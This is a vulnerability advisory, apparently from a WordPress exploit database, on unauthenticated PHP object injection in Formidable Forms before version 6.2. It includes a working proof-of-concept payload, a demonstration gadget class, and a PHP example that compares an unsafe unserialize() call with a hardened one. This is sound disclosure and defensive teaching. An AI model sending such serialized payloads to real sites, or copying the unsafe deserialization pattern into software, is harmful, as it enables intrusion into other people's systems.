wpexploit | Nguyen Huu Do | WPEX-ID:8C727A31-FF65-4472-8191-B1BECC08192A
History: Apr 06, 2023 - 12:00 a.m.

Formidable Forms < 6.2 - Unauthenticated PHP Object Injection

formidable forms
unauthenticated
php object injection
plugin
gadget chain
arbitrary deserialization
security vulnerability

EPSS: 0.001 (percentile: 17.8%)

The plugin unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present.

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  // PHP calls __wakeup() automatically when unserialize() rebuilds an Evil object.
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

1. Activate this plugin and create a simple form.
2. Embed the form in an existing page.
3. As an anonymous user, fill in the text field with O:4:"Evil":0:{} and submit the form.
4. You will see the "Arbitrary deserialization" result.
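
The same payload outside WordPress, with the weak call beside a hardened one. This is an added example, not code from the plugin or the advisory: `load_field_unsafe`, `load_field_safe` and `has_object` are hypothetical names, and this `Evil` counts calls instead of calling die() so both paths can run.

```php
<?php
class Evil {
    public static $wakeups = 0;
    // Stand-in for the page's gadget: counts calls instead of die().
    public function __wakeup(): void {
        self::$wakeups++;
    }
}

// Weak pattern: the payload chooses which class is instantiated, so magic methods run.
function load_field_unsafe(string $raw) {
    return unserialize($raw);
}

// True if $value is, or contains, an object that unserialize() refused to instantiate.
function has_object($value): bool {
    if ($value instanceof __PHP_Incomplete_Class) {
        return true;
    }
    foreach ((is_array($value) ? $value : []) as $item) {
        if (has_object($item)) {
            return true;
        }
    }
    return false;
}

// Hardened pattern: never instantiate classes from submitted data, and reject
// any payload that tried to carry an object, including one nested in an array.
function load_field_safe(string $raw) {
    $value = @unserialize($raw, ['allowed_classes' => false]);
    if ($value === false && $raw !== serialize(false)) {
        return $raw;   // not serialized data: keep it as a plain string
    }
    if (has_object($value)) {
        throw new InvalidArgumentException('serialized object rejected');
    }
    return $value;
}

$payload = 'O:4:"Evil":0:{}';   // the field value from step 3
load_field_unsafe($payload);
echo "unsafe: __wakeup calls = ", Evil::$wakeups, "\n";
Evil::$wakeups = 0;
try {
    load_field_safe($payload);
} catch (InvalidArgumentException $e) {
    echo "safe: ", $e->getMessage(), ", __wakeup calls = ", Evil::$wakeups, "\n";
}
```

With `allowed_classes` set to false, PHP builds a `__PHP_Incomplete_Class` placeholder instead of `Evil`, so no magic method of an application class is invoked. Where a field only ever holds text, not calling unserialize() on it at all is the simpler option.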
